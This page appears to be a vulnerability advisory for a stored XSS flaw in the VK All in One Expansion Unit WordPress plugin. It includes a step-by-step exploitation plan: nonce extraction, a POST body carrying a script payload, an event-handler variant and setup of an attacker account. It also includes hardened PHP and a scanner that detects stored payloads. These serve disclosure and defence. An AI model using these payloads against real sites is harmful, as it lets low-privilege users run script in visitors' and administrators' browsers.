CVE-2025-11737

VK All in One Expansion Unit <= 9.112.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Severity: medium
Patched in: 9.112.4
Time to patch: 84 days

Description

The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_sns_title' parameter in all versions up to, and including, 9.112.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 9.112.3
Published: February 17, 2026
Last updated: May 12, 2026

Source Code

WordPress.org SVN
Vulnerable: v9.112.3.0
Patched: patched version not available.

Research Plan
Unverified


This research plan outlines the steps to exploit CVE-2025-11737, a Stored Cross-Site Scripting (XSS) vulnerability in the VK All in One Expansion Unit plugin for WordPress.


1. Vulnerability Summary

  • Vulnerability: Stored Cross-Site Scripting (XSS) via the vkExUnit_sns_title parameter.
  • Affected Versions: <= 9.112.3.
  • Vulnerable Component: The "SNS" (Social Networking Service) settings module, specifically the portion that allows users to override the title for Open Graph (OG) or Twitter Cards on a per-post basis.
  • Root Cause: The plugin fails to adequately sanitize the vkExUnit_sns_title input when saving post meta and fails to escape the value when outputting it in the <head> section of the page (usually within meta tags like og:title or twitter:title).
  • Required Privileges: Contributor or higher (users with the edit_posts capability).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/post.php (for existing posts) or /wp-admin/post-new.php (for new posts).
  • Action: editpost (standard WordPress post update).
  • Parameter: vkExUnit_sns_title.
  • Preconditions: The "SNS" module must be active within the VK All in One Expansion Unit settings.
  • Persistence: The payload is stored in the wp_postmeta table and persists until the post is deleted or the meta value is manually updated.

3. Code Flow (Inferred)

  1. Input: An authenticated Contributor submits a post edit form. The POST request includes vkExUnit_sns_title=<script>alert(1)</script>.
  2. Storage: The plugin registers a hook (likely save_post) that processes fields from the VK ExUnit meta box.
    • Function: Likely within a class handling post meta, e.g., VkExUnit_Sns_Admin::save_post_meta.
    • Logic: update_post_meta($post_id, 'vkExUnit_sns_title', $_POST['vkExUnit_sns_title']) is called without sanitize_text_field.
  3. Output: When a user (admin or public) views the post.
    • Hook: add_action('wp_head', ...) or a similar hook used for SEO/SNS meta tags.
    • Function: Likely VkExUnit_Sns_Public::output_ogp or similar.
    • Logic: The value of vkExUnit_sns_title is retrieved using get_post_meta.
    • Sink: The value is echoed directly into a <meta> tag attribute or content without esc_attr or esc_html.
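The root cause in section 1 and the inferred save/output flow in section 3 come down to one missing step on each side: no sanitization when the meta is written, no escaping when it is echoed into the <meta> tag. The code below is an added example of the hardened form of that pair, written for this page; it is not the plugin's own code, patched or otherwise. It assumes a WordPress runtime, and the function names, the nonce field example_sns_nonce and the nonce action example_save_sns are hypothetical; only the meta key vkExUnit_sns_title is taken from the advisory.

```php
<?php
// Added example, not code from the VK All in One Expansion Unit plugin.
// Assumes a WordPress runtime. Function, nonce and action names are hypothetical;
// the meta key 'vkExUnit_sns_title' is the one named in the advisory.

// Inferred vulnerable pattern (from the research plan above), for contrast:
//   update_post_meta( $post_id, 'vkExUnit_sns_title', $_POST['vkExUnit_sns_title'] );
//   echo '<meta property="og:title" content="' . get_post_meta( $post_id, 'vkExUnit_sns_title', true ) . '">';
// No sanitization on the way in, no escaping on the way out.

// 1. Register the meta key with a sanitize callback. sanitize_meta() runs inside
//    update_metadata(), so this also covers writes that never touch the meta box
//    (REST API, WP-CLI, other plugins), not just the post.php form.
add_action( 'init', function () {
    register_post_meta( 'post', 'vkExUnit_sns_title', array(
        'type'              => 'string',
        'single'            => true,
        'sanitize_callback' => 'sanitize_text_field',
        'auth_callback'     => function ( $allowed, $meta_key, $post_id ) {
            return current_user_can( 'edit_post', $post_id );
        },
    ) );
} );

// 2. Save handler: nonce, capability and sanitization before update_post_meta().
add_action( 'save_post', 'example_save_sns_title', 10, 2 );
function example_save_sns_title( int $post_id, WP_Post $post ): void {
    if ( wp_is_post_autosave( $post_id ) || wp_is_post_revision( $post_id ) ) {
        return;
    }
    // Reject submissions that did not come through the plugin's own meta box.
    if ( empty( $_POST['example_sns_nonce'] )
        || ! wp_verify_nonce( sanitize_key( $_POST['example_sns_nonce'] ), 'example_save_sns' ) ) {
        return;
    }
    // edit_posts gets a Contributor into the editor; edit_post checks this specific post.
    if ( ! current_user_can( 'edit_post', $post_id ) || ! isset( $_POST['vkExUnit_sns_title'] ) ) {
        return;
    }
    // sanitize_text_field() strips tags, invalid octets and line breaks; wp_unslash()
    // removes the slashes WordPress adds to $_POST so a stored quote is a plain quote.
    $title = sanitize_text_field( wp_unslash( $_POST['vkExUnit_sns_title'] ) );
    if ( '' === $title ) {
        delete_post_meta( $post_id, 'vkExUnit_sns_title' );
        return;
    }
    update_post_meta( $post_id, 'vkExUnit_sns_title', $title );
}

// 3. Output: escape at the sink regardless of what the save path did. esc_attr() turns
//    " ' < > & into entities, so a stored "><script> cannot close the content="" attribute.
add_action( 'wp_head', 'example_output_og_title' );
function example_output_og_title(): void {
    if ( ! is_singular() ) {
        return;
    }
    $title = get_post_meta( get_queried_object_id(), 'vkExUnit_sns_title', true );
    if ( ! is_string( $title ) || '' === $title ) {
        return;
    }
    printf( '<meta property="og:title" content="%s">' . "\n", esc_attr( $title ) );
    printf( '<meta name="twitter:title" content="%s">' . "\n", esc_attr( $title ) );
}
```

Both halves matter independently. Input sanitization keeps markup out of wp_postmeta, but escaping at the sink is what actually prevents execution, and it is the only protection for values that reached the table by another route. The escaping function must match the context: esc_attr() for a value inside a quoted attribute, which is where the advisory says this value lands.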

4. Nonce Acquisition Strategy

Since this exploit leverages the standard WordPress post-editing flow, the primary nonces required are those generated by WordPress core for post editing.

  1. Identify Shortcode/Trigger: The SNS meta box appears on the standard Post/Page editor. No specific shortcode is needed to trigger the vulnerability, but the plugin must be active.
  2. Create/Edit Post:
    • Navigate to /wp-admin/post-new.php.
    • Extract the _wpnonce from the form (action: add-post).
    • Extract the _wp_http_referer.
  3. JavaScript Extraction:
    The execution agent should use browser_navigate to the post editor and then:
    • browser_eval("document.querySelector('#_wpnonce').value") to get the core WordPress nonce.
    • Check for plugin-specific nonces in the VK ExUnit meta box if check_admin_referer is used by the plugin (e.g., browser_eval("document.querySelector('#vkExUnit_sns_nonce')?.value")).

5. Exploitation Strategy

Step 1: Setup
Create a Contributor-level user and ensure the plugin is active.

Step 2: Payload Injection
Submit a POST request to /wp-admin/post.php to save the malicious SNS title.

  • URL: http://localhost:8080/wp-admin/post.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Payload (Body):
    action=editpost
    &post_ID=[POST_ID]
    &_wpnonce=[NONCE]
    &_wp_http_referer=/wp-admin/post.php?post=[POST_ID]&action=edit
    &post_title=XSS Test
    &vkExUnit_sns_title="><script>alert(document.domain)</script>
    &vkExUnit_sns_description=TestDescription
    
    Note: The payload "><script>... is designed to break out of the content attribute of a <meta> tag.

Step 3: Verification (Frontend)
Navigate to the frontend URL of the post created/edited.

6. Test Data Setup

  1. Plugin Status: Ensure vk-all-in-one-expansion-unit is installed and activated.
  2. User: Create a contributor:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Post: Create an initial post for the contributor to edit:
    wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title="Target Post"

7. Expected Results

  • The POST request should return a 302 Redirect back to the post editor.
  • When viewing the frontend of the post or the "Preview," the HTML source should contain:
    <meta property="og:title" content=""><script>alert(document.domain)</script>"> (or similar depending on the specific meta tag used).
  • A browser alert box should appear showing the site domain.

8. Verification Steps (Post-Exploit)

Confirm the metadata is stored in the database:
wp post meta get [POST_ID] vkExUnit_sns_title
Expected output: "><script>alert(document.domain)</script>

9. Alternative Approaches

  • Meta Box Check: If the plugin uses a different meta key (e.g., a serialized array), use wp post meta list [POST_ID] to find the exact key used by VK ExUnit.
  • Attribute Breakout: If the payload is rendered inside an attribute but the plugin performs basic escaping of >, try a payload that uses event handlers:
    vkExUnit_sns_title='onmouseover=alert(1) style=position:fixed;top:0;left:0;width:100%;height:100%;' (if injected into a tag that supports event handlers).
  • Twitter Card Sink: Check if the payload reflects in twitter:title or twitter:description if og:title is sanitized but others are not.
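Sections 7 to 9 describe what a stored payload looks like once it is in wp_postmeta, including the attribute-breakout and event-handler shapes. For a site owner or incident responder the useful check is the reverse one: find such values that are already stored. The following is an added example, not part of the advisory or the plugin: a pure-PHP scanner over rows shaped like wp_postmeta, run here on constructed sample rows so it executes offline with php. The $wpdb query in the closing comment shows how the same function would be fed real rows from inside WordPress.

```php
<?php
// Added example, not part of the advisory or the plugin. Flags post meta values that
// contain markup or script constructs a plain-text SNS title should never hold.
// The sample rows below are constructed; on a live site they come from $wpdb.

/** Meta keys the advisory and its "Alternative Approaches" section point at. */
const SNS_META_KEYS = array( 'vkExUnit_sns_title', 'vkExUnit_sns_description' );

/** Patterns that indicate markup or script in a value meant to be plain text. */
const XSS_INDICATORS = array(
    'html_tag'           => '/<\s*\/?[a-z!?]/i',   // <script>, </title>, <!-- ...
    'attribute_breakout' => '/["\'][^"\']*>/',      // "> or '> closing an attribute
    'event_handler'      => '/\bon[a-z]+\s*=/i',    // onmouseover=, onerror=
    'javascript_uri'     => '/javascript\s*:/i',
    'entity_obfuscation' => '/&#x?[0-9a-f]+;?/i',   // &#60; or &#x3c; style encodings
);

/**
 * Classify one meta value. Returns an empty array when it looks clean,
 * otherwise the names of the indicators that matched.
 */
function classify_meta_value( string $meta_value ): array {
    $hits = array();
    foreach ( XSS_INDICATORS as $name => $regex ) {
        if ( preg_match( $regex, $meta_value ) ) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/**
 * Scan rows shaped like wp_postmeta (post_id, meta_key, meta_value) and return
 * the suspicious ones together with the indicators that matched.
 */
function scan_postmeta_rows( array $rows ): array {
    $findings = array();
    foreach ( $rows as $row ) {
        if ( ! in_array( $row['meta_key'], SNS_META_KEYS, true ) ) {
            continue; // unrelated meta key, not in scope
        }
        $hits = classify_meta_value( (string) $row['meta_value'] );
        if ( $hits ) {
            $findings[] = array(
                'post_id'    => (int) $row['post_id'],
                'meta_key'   => $row['meta_key'],
                'indicators' => $hits,
                'value'      => $row['meta_value'],
            );
        }
    }
    return $findings;
}

// Constructed sample rows: a benign title, the two payload shapes named in the plan,
// and an unrelated key that must be skipped.
$sample_rows = array(
    array( 'post_id' => 12, 'meta_key' => 'vkExUnit_sns_title',       'meta_value' => 'Spring campaign 2026' ),
    array( 'post_id' => 13, 'meta_key' => 'vkExUnit_sns_title',       'meta_value' => '"><script>alert(document.domain)</script>' ),
    array( 'post_id' => 14, 'meta_key' => 'vkExUnit_sns_description', 'meta_value' => "'onmouseover=alert(1) style=position:fixed" ),
    array( 'post_id' => 15, 'meta_key' => '_edit_lock',               'meta_value' => '1700000000:1' ),
);

foreach ( scan_postmeta_rows( $sample_rows ) as $f ) {
    printf( "post %d  %-26s %s\n", $f['post_id'], $f['meta_key'], implode( ',', $f['indicators'] ) );
}

// On a live site, feed real rows instead (inside WordPress, e.g. from a WP-CLI command):
//   global $wpdb;
//   $rows = $wpdb->get_results( $wpdb->prepare(
//       "SELECT post_id, meta_key, meta_value FROM {$wpdb->postmeta} WHERE meta_key IN (%s, %s)",
//       ...SNS_META_KEYS ), ARRAY_A );
```

The indicators are deliberately narrow so that ordinary titles are not flagged: html_tag requires a letter after the <, so a title such as "Prices < 10" passes, while anything that could open a tag, close an attribute or attach an event handler is reported. A finding should be treated as confirmation that the vulnerable version was exploited on that post, which makes the post author and the edit history of that post the next things to look at.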
